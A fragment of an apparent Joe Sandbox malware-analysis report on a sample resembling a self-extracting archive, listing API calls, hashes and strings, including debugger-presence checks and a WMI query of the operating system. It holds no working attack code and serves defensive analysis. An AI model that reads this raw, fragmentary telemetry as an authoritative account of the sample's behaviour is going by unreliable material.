                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CBC417
                                                                                              • FindClose.KERNEL32(00000000), ref: 00CBC41E
                                                                                              • _swprintf.LIBCMT ref: 00CBC477
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CBC48A
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CBC4A7
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CBC4C7
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBC4D7
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBC4F1
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBC509
                                                                                              • _swprintf.LIBCMT ref: 00CBC535
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CBC548
                                                                                              • _swprintf.LIBCMT ref: 00CBC59C
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CBC5AF
                                                                                                • Part of subcall function 00CBAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CBAF35
                                                                                                • Part of subcall function 00CBAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CDE72C,?,?), ref: 00CBAF84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 797121971-1840816070
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA6FAA
                                                                                              • _wcslen.LIBCMT ref: 00CA7013
                                                                                              • _wcslen.LIBCMT ref: 00CA7084
                                                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                                                                • Part of subcall function 00CAA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641,000000FF), ref: 00CAA1F1
                                                                                                • Part of subcall function 00CAA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641), ref: 00CAA21F
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CA7139
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CA7155
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CA7298
                                                                                                • Part of subcall function 00CA9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CA73BC,?,?,?,00000000), ref: 00CA9DBC
                                                                                                • Part of subcall function 00CA9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9E70
                                                                                                • Part of subcall function 00CA9620: CloseHandle.KERNELBASE(000000FF,?,?,00CA95D6,?,?,?,?,?,00CD2641,000000FF), ref: 00CA963B
                                                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3983180755-3508440684
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: H_prolog_swprintf
                                                                                              • String ID: CMT$h%u$hc%u
                                                                                              • API String ID: 146138363-3282847064
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA2874
                                                                                              • _strlen.LIBCMT ref: 00CA2E3F
                                                                                                • Part of subcall function 00CB02BA: __EH_prolog.LIBCMT ref: 00CB02BF
                                                                                                • Part of subcall function 00CB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CABAE9,00000000,?,?,?,0001046E), ref: 00CB1BA0
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA2F91
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 1206968400-2756464174
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CBF844
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00CBF910
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CBF930
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00CBF93A
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,00CBE5E8,0000001C,00CBE7DD,00000000,?,?,?,?,?,?,?,00CBE5E8,00000004,00D01CEC,00CBE86D), ref: 00CBE6B4
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CBE5E8,00000004,00D01CEC,00CBE86D), ref: 00CBE6CF
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D
                                                                                              • API String ID: 401686933-2746444292
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CC8FB5
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CC8FBF
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00CC8FCC
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CBAF35
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CDE72C,?,?), ref: 00CBAF84
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00CA6DDF,00000000,00000400), ref: 00CA6C74
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CA6C95
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CD19EF,?,?,00000008,?,?,00CD168F,00000000), ref: 00CD1C21
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CBF66A
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CBF3A5), ref: 00CBF9DA
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00CAE30E
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                                • Part of subcall function 00CB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CE1030,00000200,00CAD928,00000000,?,00000050,00CE1030), ref: 00CB1DC4
                                                                                              • _strlen.LIBCMT ref: 00CAE32F
                                                                                              • SetDlgItemTextW.USER32(?,00CDE274,?), ref: 00CAE38F
                                                                                              • GetWindowRect.USER32(?,?), ref: 00CAE3C9
                                                                                              • GetClientRect.USER32(?,?), ref: 00CAE3D5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CAE475
                                                                                              • GetWindowRect.USER32(?,?), ref: 00CAE4A2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00CAE4DB
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00CAE4E3
                                                                                              • GetWindow.USER32(?,00000005), ref: 00CAE4EE
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00CAE51B
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00CAE58D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00CCCB66
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC71E
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC730
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC742
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC754
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC766
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC778
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC78A
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC79C
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7AE
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7C0
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7D2
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7E4
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7F6
                                                                                              • _free.LIBCMT ref: 00CCCB5B
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CCCB7D
                                                                                              • _free.LIBCMT ref: 00CCCB92
                                                                                              • _free.LIBCMT ref: 00CCCB9D
                                                                                              • _free.LIBCMT ref: 00CCCBBF
                                                                                              • _free.LIBCMT ref: 00CCCBD2
                                                                                              • _free.LIBCMT ref: 00CCCBE0
                                                                                              • _free.LIBCMT ref: 00CCCBEB
                                                                                              • _free.LIBCMT ref: 00CCCC23
                                                                                              • _free.LIBCMT ref: 00CCCC2A
                                                                                              • _free.LIBCMT ref: 00CCCC47
                                                                                              • _free.LIBCMT ref: 00CCCC5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00CB9736
                                                                                              • _wcslen.LIBCMT ref: 00CB97D6
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00CB97E5
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CB9806
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CB982D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 00CBD6C1
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00CBD6ED
                                                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBD709
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CBD720
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBD734
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CBD75D
                                                                                              • DeleteObject.GDI32(00000000), ref: 00CBD764
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00CBD76D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00CC9705
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CC9711
                                                                                              • _free.LIBCMT ref: 00CC971C
                                                                                              • _free.LIBCMT ref: 00CC9727
                                                                                              • _free.LIBCMT ref: 00CC9732
                                                                                              • _free.LIBCMT ref: 00CC973D
                                                                                              • _free.LIBCMT ref: 00CC9748
                                                                                              • _free.LIBCMT ref: 00CC9753
                                                                                              • _free.LIBCMT ref: 00CC975E
                                                                                              • _free.LIBCMT ref: 00CC976C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA6FAA
                                                                                              • _wcslen.LIBCMT ref: 00CA7013
                                                                                              • _wcslen.LIBCMT ref: 00CA7084
                                                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBB610
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBB637
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CBB650
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00CBB661
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00CBB66A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CBB67E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CBB694
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: 97c08238208e7ceaf365944054beb1a54ca5493b8eacdbcecddde23a6ede8c8f
                                                                                              • Instruction ID: 9f42a3025d8853399240b4c507746578bc9c7fe36b2c9f82718b8789d78dd005
                                                                                              • Opcode Fuzzy Hash: 97c08238208e7ceaf365944054beb1a54ca5493b8eacdbcecddde23a6ede8c8f
                                                                                              • Instruction Fuzzy Hash: C721C732204319BBD6255F66ED4AFBF3B7DEB4AB41F010018F609D65E0CBA29E01D636
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,4AECFFE7,00000001,00000000,00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFD99
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE14
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00CBFE1F
                                                                                              • _com_issue_error.COMSUPP ref: 00CBFE48
                                                                                              • _com_issue_error.COMSUPP ref: 00CBFE52
                                                                                              • GetLastError.KERNEL32(80070057,4AECFFE7,00000001,00000000,00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE57
                                                                                              • _com_issue_error.COMSUPP ref: 00CBFE6A
                                                                                              • GetLastError.KERNEL32(00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE80
                                                                                              • _com_issue_error.COMSUPP ref: 00CBFE93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: 826534a9a07131a119aa377017d722a9f7928e87329bb1f3072a16c42d6e92aa
                                                                                              • Instruction ID: 248ffa0f0dc1f2b8868cd22553d3eea75672cdadac8801c323067c937d2605c6
                                                                                              • Opcode Fuzzy Hash: 826534a9a07131a119aa377017d722a9f7928e87329bb1f3072a16c42d6e92aa
                                                                                              • Instruction Fuzzy Hash: 804108B1A00259ABDB109F68DC45BEEBBA8EB48710F10823EF915E7351D735DA01C7A5
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 3519838083-3505469590
                                                                                              • Opcode ID: 420c7de5e381ab3e9116158ed241fb9b0154bc9dfca74a5e13bd8838b124cf97
                                                                                              • Instruction ID: df8f749fbd8e0102be24f105cd5b739c2f64c2696e1fce1b5be3d2ebaa5d8d32
                                                                                              • Opcode Fuzzy Hash: 420c7de5e381ab3e9116158ed241fb9b0154bc9dfca74a5e13bd8838b124cf97
                                                                                              • Instruction Fuzzy Hash: A47170B0A0021AAFDF14DFA4CC95AAFB7B9FF49314B14015EE512A72A1CB306E41DB61
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA9387
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CA93AA
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CA93C9
                                                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                                                              • _swprintf.LIBCMT ref: 00CA9465
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00CA94D4
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00CA9514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 3726343395-3303766350
                                                                                              • Opcode ID: 707cd57fc7ec4aeb967a3f0e427f381b9eac8cd0bee9dba9805f05c654ab9107
                                                                                              • Instruction ID: d8593ec027ba409c95f1c52e12ec5d9180e2ba150b24593d0823f86fa1f9e90f
                                                                                              • Opcode Fuzzy Hash: 707cd57fc7ec4aeb967a3f0e427f381b9eac8cd0bee9dba9805f05c654ab9107
                                                                                              • Instruction Fuzzy Hash: 614198B1D0025A66CF21EBA0CC46EDF737CEF46344F0049A5B619E3051EB389B89EB60
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00CB122E
                                                                                                • Part of subcall function 00CAB146: GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CB1251
                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CB1263
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CB1274
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1284
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1294
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CB12CF
                                                                                              • __aullrem.LIBCMT ref: 00CB1379
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
